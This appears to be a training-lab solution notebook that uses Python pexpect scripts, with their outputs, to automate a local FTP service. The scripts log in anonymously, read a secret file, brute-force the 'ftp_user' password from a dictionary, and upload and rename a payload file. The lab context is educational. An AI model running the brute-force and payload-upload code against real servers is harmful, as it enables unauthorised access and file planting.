# Automating FTP Interaction Solution

FTP service is running on it's **default port** on the local machine. Write code snippets to perform the given tasks.

Note: A password dictionary "password_dictionary.txt" is present in the current working directory. 


### Anonymous User

**Task 1:**  Print the FTP welcome banner.

In [7]:
import pexpect

# Launching the process
child = pexpect.spawn ('ftp localhost')
# Expecting a username prompt
child.expect ('Name .*: ')

# Printing the interaction
print child.before

Connected to localhost.
220 Welcome to AttackDefense target FTP service.



**Task 2:**  Check if you can login to FTP service without any authentication i.e. anonymous user?

In [11]:
import pexpect

child = pexpect.spawn ('ftp localhost')
child.expect ('Name .*: ')

# Anonymous login
child.sendline ('anonymous')
# Expected Password prompt
child.expect ('Password:')
# Password
child.sendline ('noah@example.com')
# Expecting FTP prompt
child.expect ('ftp> ')


print child.before


230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.



**Task 3:**  Print the contents of remote working directory.

In [13]:
import pexpect

child = pexpect.spawn ('ftp localhost')
child.expect ('Name .*: ')
child.sendline ('anonymous')
child.expect ('Password:')
child.sendline ('noah@example.com')
child.expect ('ftp> ')
# Sending directory listing command
child.sendline ('ls')
# Expecting FTP prompt
child.expect ('ftp> ')

print child.before

ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    1 65534    65534        4096 Sep 24 02:58 ftp
226 Directory send OK.



**Task 4:**  Read the content of the file "secret.txt" present in "ftp" directory of remote machine.

In [16]:
import pexpect

child = pexpect.spawn ('ftp localhost')
child.expect ('Name .*: ')
child.sendline ('anonymous')
child.expect ('Password:')
child.sendline ('noah@example.com')
child.expect ('ftp> ')
child.sendline ('ls')
child.expect ('ftp> ')

# Change to directory
child.sendline ('cd ftp')
child.expect ('ftp> ')
# Listing files in subdirectory
child.sendline ('ls')
child.expect ('ftp> ')
# Printing contents of the  secret.txt file
child.sendline ('get secret.txt -')
child.expect ('ftp> ')

print child.before

get secret.txt -
remote: secret.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for secret.txt (41 bytes).
secret nonce: thisisasecretnonce98835648
226 Transfer complete.
41 bytes received in 0.00 secs (315.2682 kB/s)



**Task 5:**  Get the file "secret.txt" present in "ftp" to local machine.

In [17]:
import pexpect

child = pexpect.spawn ('ftp localhost')
child.expect ('Name .*: ')
child.sendline ('anonymous')
child.expect ('Password:')
child.sendline ('noah@example.com')
child.expect ('ftp> ')
child.sendline ('ls')
child.expect ('ftp> ')
child.sendline ('cd ftp')
child.expect ('ftp> ')
child.sendline ('ls')
child.expect ('ftp> ')

# Downloading the secret.txt file
child.sendline ('get secret.txt')
child.expect ('ftp> ')

print child.before

get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for secret.txt (41 bytes).
226 Transfer complete.
41 bytes received in 0.00 secs (261.6932 kB/s)



### Authenticated User

**Task 6:**  Figure out the password for user "ftp_user" by bruteforcing the FTP login. 

In [28]:
import pexpect

username='ftp_user'
password_dict="password_dictionary.txt"

# Loading the password dictionary and Striping \n
lines = [line.rstrip('\n') for line in open(password_dict)]

itr = 0
# Iterating over dictionary
for password in lines:
    child = pexpect.spawn ('ftp localhost')
    child.expect ('Name .*: ')
    child.sendline ('ftp_user')
    print "Trying with password: ",password
    child.expect ('Password:')
    child.sendline (password)
    i = child.expect (['Login successful', 'Login failed'])
    if i==1:
        #print('Login failed')
        child.kill(0)
    elif i==0:
        print "Login Successful for ",password
        print child.before
        break

Trying with password:  123456
Trying with password:  12345
Trying with password:  1234
Trying with password:  1234567
Trying with password:  dragon
Trying with password:  baseball
Trying with password:  abc123
Trying with password:  letmein
Trying with password:  696969
Trying with password:  shadow
Trying with password:  michael
Trying with password:  654321
Trying with password:  superman
Trying with password:  1qaz2wsx
Trying with password:  7777777
Trying with password:  121212
Trying with password:  000000
Trying with password:  qazwsx
Trying with password:  123qwe
Trying with password:  killer
Trying with password:  trustno1
Trying with password:  jordan
Trying with password:  jennifer
Trying with password:  zxcvbnm
Trying with password:  asdfgh
Trying with password:  hunter
Trying with password:  buster
Trying with password:  soccer
Trying with password:  harley
Trying with password:  batman
Trying with password:  andrew
Trying with password:  tigger
Trying with password:  sunsh

**Task 7:** Copy "payload.bin" file from present working directory to "ftp/files" directory of the remote machine.

In [26]:
import pexpect 

username='ftp_user'
password='qwer1234'

child = pexpect.spawn ('ftp localhost')
child.expect ('Name .*: ')
child.sendline (username)
child.expect ('Password:')
child.sendline (password)
child.expect ('ftp> ')
child.sendline ('ls')
child.expect ('ftp> ')
print child.before

child.sendline ('cd files')
child.expect ('ftp> ')

# Uploading the secret.txt file
child.sendline ('put payload.bin')
child.expect ('ftp> ')

child.sendline ('ls')
child.expect ('ftp> ')
print child.before

child.kill(0)

ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    1 999      999          4096 Sep 24 03:50 files
-rw-r--r--    1 0        0              41 Sep 20 18:07 secret.txt
226 Directory send OK.

ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-------    1 1001     1001           49 Sep 24 03:51 payload.bin
-rw-------    1 1001     1001           49 Sep 24 03:49 payload.sh
226 Directory send OK.



**Task 8:**  Rename the payload.bin file (eralier transfered to "ftp/files" directory) to "payload.sh". 

In [27]:
import pexpect 

username='ftp_user'
password='qwer1234'

child = pexpect.spawn ('ftp localhost')
child.expect ('Name .*: ')
child.sendline (username)
child.expect ('Password:')
child.sendline (password)
child.expect ('ftp> ')
child.sendline ('ls')
child.expect ('ftp> ')
print child.before

child.sendline ('cd files')
child.expect ('ftp> ')
print child.before

# Renaming the secret.txt file
child.sendline ('rename payload.bin payload.sh')
child.expect ('ftp> ')

child.sendline ('ls')
child.expect ('ftp> ')
print child.before
child.kill(0)

ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    1 999      999          4096 Sep 24 03:51 files
-rw-r--r--    1 0        0              41 Sep 20 18:07 secret.txt
226 Directory send OK.

cd files
250 Directory successfully changed.

ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-------    1 1001     1001           49 Sep 24 03:51 payload.sh
226 Directory send OK.

